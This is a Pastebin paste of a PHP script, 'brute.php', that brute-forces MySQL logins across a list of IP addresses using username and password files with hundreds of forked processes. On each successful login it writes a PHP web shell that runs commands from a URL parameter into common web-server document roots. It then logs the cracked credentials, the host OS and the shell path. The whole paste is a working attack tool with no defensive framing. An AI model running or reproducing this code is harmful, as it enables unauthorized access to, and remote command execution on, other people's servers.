SHARE
TWEET

brute.php

benkow_ Dec 17th, 2015 (edited) 324 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. $servers = 'ip.txt';
  3. $users = 'users.txt';
  4. $pass = 'pass.txt';
  5. $threads = 400;
  6. $logs = 'logs.txt';
  7. $good = 'rez.txt';
  8.  
  9. ini_set('memory_limit', '1024M');
  10.  
  11. $doc_root[] = '/usr/local/apache2/htdocs';
  12. $doc_root[] = '/var/www';
  13. $doc_root[] = '/var/www/html';
  14. $doc_root[] = '/Library/WebServer/Documents';
  15. $doc_root[] = '/usr/pkg/share/httpd/htdocs';
  16. $doc_root[] = '/usr/local/www/apache22/data';
  17. $doc_root[] = '/usr/local/www/data';
  18. $doc_root[] = '/var/www/htdocs';
  19. $doc_root[] = '/var/apache2/htdocs/';
  20. $doc_root[] = 'C:/Program Files/Apache Software Foundation/Apache2.2/htdocs';
  21. $doc_root[] = '/var/apache2/htdocs';
  22. $doc_root[] = '/svr/httpd/htdocs';
  23. $doc_root[] = '/srv/www/htdocs';
  24. $doc_root[] = '/var/www/localhost/htdocs';
  25.  
  26. echo 'Reading '.$servers.'...'.PHP_EOL;
  27. $o_sv = file_get_contents($servers);
  28. $o_sv = explode(PHP_EOL, $o_sv);
  29.  
  30. echo 'Reading '.$users.'...'.PHP_EOL;
  31. $o_us = file_get_contents($users);
  32. $o_us = explode(PHP_EOL, $o_us);
  33.  
  34. echo 'Reading '.$pass.'...'.PHP_EOL;
  35. $o_pw = file_get_contents($pass);
  36. $o_pw = explode(PHP_EOL, $o_pw);
  37.  
  38. if (file_exists($logs))
  39. {
  40.     echo 'Reading '.$logs.'...'.PHP_EOL;
  41.     $o_lo = file_get_contents($logs);
  42.     $o_lo = explode(PHP_EOL, $o_lo);
  43. }
  44.  
  45. echo 'Sharing unscanned IPs for each thread...'.PHP_EOL;
  46. $per_thread = ceil(count($o_sv)/$threads);
  47. $crt_array = array();
  48. $array_pos = 0;
  49. $pos = 0;
  50.  
  51. foreach ($o_sv as $sv)
  52. {
  53.     $insert = true;
  54.     // if (isset($o_lo))
  55.     // {
  56.         // if (in_array($sv, $o_lo))
  57.         // {
  58.             // $insert = false;
  59.         // }
  60.     // }
  61.    
  62.     if ($insert)
  63.     {
  64.         $pos++;
  65.         $crt_array[$array_pos][] = $sv;
  66.         if ($pos == $per_thread)
  67.         {
  68.             $pos = 0;
  69.             $array_pos++;
  70.         }
  71.     }
  72. }
  73.  
  74. echo 'Creating and opening log files...'.PHP_EOL;
  75. $log = fopen($logs, 'a+');
  76. $log2 = fopen($good, 'a+');
  77. $done_ip = array();
  78.  
  79. echo 'Start cracking passwords...'.PHP_EOL;
  80. for ($i = 0; $i<count($crt_array); $i++)
  81. {
  82.     $pid = pcntl_fork();
  83.     if (!$pid)
  84.     {
  85.         foreach ($crt_array[$i] as $srv)
  86.         {          
  87.             foreach ($o_us as $thisUser)
  88.             {
  89.                 foreach ($o_pw as $thisPass)
  90.                 {
  91.                     if ((!in_array($srv, $done_ip)) && ($srv != '') && ($thisUser != ''))
  92.                     {
  93.                         $connect = @mysql_connect($srv, $thisUser, $thisPass);
  94.                         if ($connect)
  95.                         {
  96.                             $sql = mysql_query('SHOW VARIABLES LIKE "version_compile_os"');
  97.                             $get = mysql_fetch_array($sql);
  98.                            
  99.                             $shell = '';
  100.                            
  101.                             $sql_f1 = @mysql_query('CREATE DATABASE fuck', $connect);
  102.                             if ($sql_f1)
  103.                             {
  104.                                 $sql_f2 = @mysql_select_db('fuck', $connect);
  105.                                 if ($sql_f2)
  106.                                 {
  107.                                     $sql_f3 = @mysql_query('CREATE TABLE fuck(PACKET TEXT)', $connect);
  108.                                     if ($sql_f3)
  109.                                     {
  110.                                         $sql_f4 = @mysql_query('INSERT INTO fuck (packet)VALUES("<pre><body bgcolor=silver><? @system($_GET[\'cmd\']); ?></body></pre>")', $connect);
  111.                                         if ($sql_f4)
  112.                                         {
  113.                                             foreach ($doc_root as $dr)
  114.                                             {
  115.                                                 $sql_f5 = @mysql_query('SELECT * INTO DUMPFILE \''.$dr.'/faq1.php\' FROM fuck', $connect);
  116.                                                 if ($sql_f5)
  117.                                                 {
  118.                                                     $shell = ' Shell: /faq1.php?cmd=id';
  119.                                                     @mysql_query('drop database fuck', $connect);
  120.                                                     break;
  121.                                                 }
  122.                                                 else if (mysql_errno() == 13)
  123.                                                 {
  124.                                                     @mysql_query('drop database fuck', $connect);
  125.                                                     break;
  126.                                                 }
  127.                                             }
  128.                                             @mysql_query('drop database fuck', $connect);
  129.                                         }
  130.                                     }
  131.                                 }
  132.                                
  133.                             }
  134.                            
  135.                             fwrite($log2, 'IP: '.$srv.' User: '.$thisUser.' Pass: '.$thisPass.' Dbs: 1337 OS:'.$get[1].$shell.PHP_EOL);
  136.                             $done_ip[] = $srv;
  137.                             echo $thisUser.':'.$thisPass.'@'.$srv.' -- Login success'.PHP_EOL;
  138.                         }
  139.                         else
  140.                         {
  141.                             echo $thisUser.':'.$thisPass.'@'.$srv.' -- Login failed'.PHP_EOL;
  142.                         }
  143.                     }
  144.                 }
  145.             }
  146.             fwrite($log, $srv.PHP_EOL);
  147.         }
  148.         exit($i);
  149.     }
  150. }
  151.  
  152. while (true)
  153. {
  154.     if (pcntl_waitpid(0, $status) == -1)
  155.     {
  156.         echo 'Done';
  157.         break;
  158.     }
  159. }
  160. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top